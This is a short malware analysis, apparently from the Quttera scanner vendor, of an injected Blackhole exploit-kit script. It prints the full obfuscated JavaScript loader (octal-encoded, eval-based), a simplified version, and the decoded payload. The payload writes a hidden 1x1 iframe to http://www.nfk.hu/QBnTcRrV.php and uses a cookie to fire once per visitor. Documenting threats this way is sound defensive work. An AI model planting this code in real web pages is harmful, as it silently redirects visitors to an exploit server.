Quttera web malware scanner detected blackhole exploit

1. /*
2.  * Quttera web malware scanner detected blackhole exploit injecting hidden iframe to malicious
3.  * web resource
4.  */
5.  
6. /*
7.  * original threat
8.  */
9. ps = "s" + "p" + "l" + "i" + "t";
10. asd = function () {
11.     ++d.body
12. };
13. a = ("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,200,164,174,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,200,164,174,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,165,155,162,65,157,174,66,130,111,165,133,152,131,171,135,65,167,157,167,56,102,24,21,47,200,164,174,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,200,164,174,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,200,164,174,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,200,164,174,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,200,164,174,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,200,164,174,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,200,164,174,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,200,164,174,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,200,164,174,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,200,164,174,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21" [ps](","));
14. d = document;
15. for (i = 0; i < a.length; i += 1) {
16.     a[i] = -(10 - 3) + parseInt(a[i], 8);
17. }
18. try {
19.     asd()
20. } catch (q) {
21.     yy = 50 - 50;
22. }
23. try {
24.     yy /= 2
25. } catch (q) {
26.     yy = 1;
27. }
28. if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));
29.  
30.  
31. /*
32.  * simplified threat version
33.  */
34. a = ("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,200,164,174,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,200,164,174,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,165,155,162,65,157,174,66,130,111,165,133,152,131,171,135,... 56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21" ["split"](","));
35.  
36. for (i = 0; i < a.length; i += 1) {
37.     a[i] = -(10 - 3) + parseInt(a[i], 8);
38. }
39.  
40. eval(String["fromCharCode"].apply(String, a));
41.  
42.  
43. /*
44.  * decoded payload inject hidden iframe to malicious domain www.nfk.hu
45.  */
46. function zzzfff() {
47.  var ymu = document.createElement('iframe');
48.  ymu.src = 'http://www.nfk.hu/QBnTcRrV.php';
49.  ymu.style.position = 'absolute';
50.  ymu.style.border = '0';
51.  ymu.style.height = '1px';
52.  ymu.style.width = '1px';
53.  ymu.style.left = '1px';
54.  ymu.style.top = '1px';
55.  if (!document.getElementById('ymu')) {
56.  document.write('<div id=\'ymu\'></div>');
57.  document.getElementById('ymu').appendChild(ymu);
58.  }
59. }
60.  
61. function SetCookie(cookieName,cookieValue,nDays,path) {
62.  var today = new Date();
63.  var expire = new Date();
64.  if (nDays==null || nDays==0) nDays=1;
65.  expire.setTime(today.getTime() + 3600000*24*nDays);
66.  document.cookie = cookieName+"="+escape(cookieValue)
67.  + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
68. }
69.  
70. function GetCookie( name ) {
71.  var start = document.cookie.indexOf( name + "=" );
72.  var len = start + name.length + 1;
73.  if ( ( !start ) &&
74.  ( name != document.cookie.substring( 0, name.length ) ) )
75.  {
76.  return null;
77.  }
78.  
79.  if ( start == -1 ) return null;
80.  
81.  var end = document.cookie.indexOf( ";", len );
82.  
83.  if ( end == -1 ) end = document.cookie.length;
84.  
85.  return unescape( document.cookie.substring( len, end ) );
86. }
87.  
88. if (navigator.cookieEnabled)
89. {
90. if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
91.  
92. zzzfff();
93.  
94. }
95.  
96. }